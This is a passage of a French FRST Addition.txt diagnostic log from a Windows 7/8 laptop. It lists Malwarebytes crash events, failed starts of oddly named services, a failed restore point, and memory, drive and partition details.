BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données. Error: (12/09/2017 04:55:46 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante mbam.exe, version : 3.0.0.1284, horodatage : 0x5a15ab42 Nom du module défaillant : Qt5Core.dll, version : 5.6.2.0, horodatage : 0x59a63e00 Code d’exception : 0xc0000005 Décalage d’erreur : 0x001aa3b6 ID du processus défaillant : 0x1404 Heure de début de l’application défaillante : 0x01d371062cce062c Chemin d’accès de l’application défaillante : C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe Chemin d’accès du module défaillant: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll ID de rapport : 6abb5332-dcf9-11e7-967a-402cf4cbb067 Error: (12/09/2017 04:55:41 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nom de l’application défaillante mbam.exe, version : 3.0.0.1284, horodatage : 0x5a15ab42 Nom du module défaillant : Qt5Core.dll, version : 5.6.2.0, horodatage : 0x59a63e00 Code d’exception : 0xc0000005 Décalage d’erreur : 0x001aa3b6 ID du processus défaillant : 0x6b8 Heure de début de l’application défaillante : 0x01d3710629baab63 Chemin d’accès de l’application défaillante : C:\Program Files\Malwarebytes\Anti-Malware\mbam.exe Chemin d’accès du module défaillant: C:\Program Files\Malwarebytes\Anti-Malware\Qt5Core.dll ID de rapport : 67ee2930-dcf9-11e7-967a-402cf4cbb067 Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: AUTORITE NT) Description: Le déchargement des chaînes de compteurs de performances pour le service WmiApRpl (WmiApRpl) a échoué. Le premier DWORD de la section Data contient le code d’erreur. Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT) Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données. Error: (12/09/2017 04:54:50 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: AUTORITE NT) Description: Les chaînes de performance dans la valeur de Registre Performance sont endommagées lors du traitement du fournisseur de compteurs d’extension Performance. La valeur BaseIndex à partir du Registre de performance est le premier DWORD dans la section Données, la valeur LastCounter est le deuxième DWORD dans la section Données, et la valeur LastHelp est le troisième DWORD dans la section Données. Error: (12/09/2017 04:53:28 PM) (Source: System Restore) (EventID: 8193) (User: ) Description: Échec de la création d’un point de restauration (Processus = C:\Windows\system32\DrvInst.exe "4" "0" "C:\Users\C-3PO\AppData\Local\Temp\{77abfab4-5fe9-39d2-0a82-1d1e434f3821}\seratousb.inf" "9" "655f5abc7" "00000000000004BC" "WinSta0\Default" "000000000000065C" "208" "c:\program files (x86)\serato\drivers\vista64\sl1" ; Description = Installation du package de pilotes : Cristalink Ltd Contrôleurs de bus USB ; Erreur = 0x80070422). Erreurs système: ============= Error: (12/09/2017 04:34:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service xy8EGwcCsXnF Updater n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (12/09/2017 04:34:43 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Windows Recover n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (12/09/2017 04:34:18 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Background Logic Handler n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (12/09/2017 04:33:10 PM) (Source: Service Control Manager) (EventID: 7043) (User: ) Description: Le service Windows Update ne s’est pas fermé correctement après avoir reçu une commande d’anticipation de fermeture. Error: (12/09/2017 04:32:31 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: Le serveur {51FA2736-5DEE-11D4-98E8-006008BF430C} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (12/09/2017 03:22:48 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: Le dépassement de délai (60000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service 8c023e14d62cc32fcaee500b3f1fb4dd. Error: (12/09/2017 03:21:48 PM) (Source: Service Control Manager) (EventID: 7011) (User: ) Description: Le dépassement de délai (60000 millisecondes) a été atteint lors de l’attente de la réponse transactionnelle du service 8c023e14d62cc32fcaee500b3f1fb4dd. Error: (12/09/2017 03:17:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service xy8EGwcCsXnF Updater n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (12/09/2017 03:17:10 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Windows Recover n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. Error: (12/09/2017 03:16:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Le service Background Logic Handler n’a pas pu démarrer en raison de l’erreur : Le fichier spécifié est introuvable. ==================== Infos Mémoire =========================== Processeur: Intel(R) Core(TM) i5-2450M CPU @ 2.50GHz Pourcentage de mémoire utilisée: 78% Mémoire physique - RAM - totale: 4030.36 MB Mémoire physique - RAM - disponible: 854.8 MB Mémoire virtuelle totale: 8058.89 MB Mémoire virtuelle disponible: 2830.03 MB ==================== Lecteurs ================================ Drive c: () (Fixed) (Total:292.99 GB) (Free:230.21 GB) NTFS Drive d: (HP_TOOLS) (Fixed) (Total:4.99 GB) (Free:4.99 GB) FAT32 ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: E3FB0C75) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=293 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=5 GB) - (Type=0C) ==================== Fin de Addition.txt ============================